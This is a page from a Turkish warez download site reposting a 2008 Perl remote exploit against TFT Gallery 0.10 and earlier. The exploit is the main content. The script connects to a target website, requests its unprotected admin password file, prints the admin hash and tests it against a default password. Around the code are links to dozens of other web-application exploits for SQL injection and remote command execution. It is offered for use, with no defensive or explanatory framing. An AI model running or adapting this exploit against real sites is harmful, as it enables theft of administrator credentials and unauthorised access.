FULL-TR.COM

Herþeyi FULL indir

• Anasayfa
• Program
• Grafik
• Oyun
• Müzik
• Video
• Adult
• Script
• Exploit
• PDA / Mobil
• E-Kitap
• Mizah

Exploit / Web Apps Exploit / TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit

Eklenme Tarihi: 2008-10-20 23:04
#!/usr/bin/perl

###############################################################################
#Copyright (C) undefined1_
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
###############################################################################

use strict;
use IO::Socket;

$| = 1;
printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";


my $website = shift || usage();

my $path = "/";
my $site = $website;
if(index($website, "/") != -1)
{
my $index = index($website, "/");
$path = substr($website, $index);
$site = substr($website, 0, $index);
if(substr($path, length($path)-1) ne "/")
{
$path .= "/";
}
}


my $eop = "\r\nHost: $site\r\n";
$eop .= "User-Agent: Mozilla/5.0\r\n";
$eop .= "Connection: close\r\n\r\n";


my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
my $data = sendpacket($site, $packet1.$eop);

if($data !~ /HTTP\/1.1 200 OK/)
{
die "failed to retrieve the admin password\n";
}

my $password = "";
if (index($data, "\r\n\r\n") != -1)
{
$password = substr($data, index($data, "\r\n\r\n")+4);
chomp $password;
}
else
{
die "failed to retrieve the admin password\n";
}

print "The password hash is: '$password'\n";
if(crypt("admin","tftgallery") eq $password)
{
print "The plaintext password is: 'admin'\n";
}
else
{
die "Use john the ripper, luke!\n";
}




sub sendpacket(\$,\$) {
my $server = shift;
my $request = shift;

my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
print $sock "$request";


my $data = "";
my $answer;
while($answer = <$sock>)
{
$data .= $answer;
}

close($sock);
return $data;
}

sub usage() {
printf "usage: %s <website> [password]\n", $0;
printf "ex. : %s www.site.com/tftgallery/\n", $0;
exit;
}

Keywords:

Benzer Sayfalar (Similar Pages):

Bulunamadý. (not found)

Bu Sayfalarda Ýlginizi Çekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation
Exploit / Web Apps Exploit / TorrentTrader 1.0 RC2 SQL Injection Exploit
Exploit / Web Apps Exploit / phpMyWebhosting SQL Injection Exploit
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.5 SQL Injection password disclosure Exploit
Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit / Web Apps Exploit / Poll It CGI v2.0 exploit
Exploit / Web Apps Exploit / CMScore SQL Injection Exploit
Exploit / Web Apps Exploit / MyPHP Forum 1.0 SQL Injection Exploit
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / PerlDesk 1.x SQL-Injection Exploit
Exploit / Web Apps Exploit / LiteForum 2.1.1 sql injection exploit
Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / ITA Forum <= 1.49 SQL Injection Exploit
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / UBB.threads 6.2.*-6.3.* one char bruteforce exploit
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit

© 2008 Full-TR.com warez